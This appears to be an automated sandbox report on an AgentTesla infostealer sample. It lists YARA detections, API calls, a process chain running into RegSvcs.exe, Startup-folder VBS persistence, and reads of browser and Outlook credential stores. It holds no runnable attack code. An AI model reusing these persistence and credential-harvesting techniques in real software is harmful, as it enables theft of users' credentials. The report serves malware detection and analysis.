                Source: RHOqJ5BrHW.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 5.2.unjuridically.exe.1f30000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 5.2.unjuridically.exe.1f30000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                Source: 5.2.unjuridically.exe.1f30000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 5.2.unjuridically.exe.1f30000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                Source: 2.2.unjuridically.exe.3430000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 2.2.unjuridically.exe.3430000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                Source: 2.2.unjuridically.exe.3430000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 2.2.unjuridically.exe.3430000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                Source: 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                Source: 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                Source: RHOqJ5BrHW.exe, 00000000.00000003.2043224561.0000000000DD3000.00000004.00000020.00020000.00000000.sdmp, RHOqJ5BrHW.exe, 00000000.00000003.2043123913.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp, RHOqJ5BrHW.exe, 00000000.00000002.2050344868.0000000000C30000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2051945448.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2052083239.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000005.00000003.2182346127.000000000181D000.00000004.00000020.00020000.00000000.sdmp, unjuridically.exe, 00000005.00000003.2182252283.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, acrorrheuma.0.drBinary or memory string: 5@B.SlN;M
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/10@2/2
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009CCE7A GetLastError,FormatMessageW,0_2_009CCE7A
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009BAB84 AdjustTokenPrivileges,CloseHandle,0_2_009BAB84
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009BB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_009BB134
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0045AB84 AdjustTokenPrivileges,CloseHandle,2_2_0045AB84
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0045B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_0045B134
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009CE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_009CE1FD
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009C6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_009C6532
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009DC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_009DC18C
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_0098406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_0098406B
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeFile created: C:\Users\user\AppData\Local\LityersesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeFile created: C:\Users\user\AppData\Local\Temp\aut9C72.tmpJump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs"
                Source: RHOqJ5BrHW.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RHOqJ5BrHW.exeReversingLabs: Detection: 57%
                Source: RHOqJ5BrHW.exeVirustotal: Detection: 62%
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeFile read: C:\Users\user\Desktop\RHOqJ5BrHW.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\RHOqJ5BrHW.exe "C:\Users\user\Desktop\RHOqJ5BrHW.exe"
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeProcess created: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe "C:\Users\user\Desktop\RHOqJ5BrHW.exe"
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\RHOqJ5BrHW.exe"
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe"
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe"
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeProcess created: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe "C:\Users\user\Desktop\RHOqJ5BrHW.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\RHOqJ5BrHW.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe" Jump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                Source: Binary string: wntdll.pdbUGP source: unjuridically.exe, 00000002.00000003.2060949043.0000000003470000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2063562070.0000000003610000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000005.00000003.2189115994.0000000004100000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000005.00000003.2193118279.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: unjuridically.exe, 00000002.00000003.2060949043.0000000003470000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2063562070.0000000003610000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000005.00000003.2189115994.0000000004100000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000005.00000003.2193118279.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_0099E01E LoadLibraryA,GetProcAddress,0_2_0099E01E
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009A6B05 push ecx; ret 0_2_009A6B18
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00446B05 push ecx; ret 2_2_00446B18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00DC06C8 push eax; ret 3_2_00DC0702
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00DC0698 push eax; ret 3_2_00DC0712
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00DC0698 push eax; ret 3_2_00DC0722
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00DC0718 push eax; ret 3_2_00DC0722
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00DC0708 push eax; ret 3_2_00DC0712
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00DC0728 push eax; ret 3_2_00DC0732
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_02E906C8 push eax; ret 6_2_02E906C2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_02E90698 push eax; ret 6_2_02E906C2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_02E90728 push eax; ret 6_2_02E90732
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_02E90718 push eax; ret 6_2_02E90722
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeFile created: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeJump to dropped file

                Boot Survival

                barindex
                Drops VBS files to the startup folder
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbsJump to dropped file
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbsJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbsJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009E8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_009E8111
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_0099EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0099EB42
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00488111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00488111
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0043EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_0043EB42
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009A123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009A123A
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
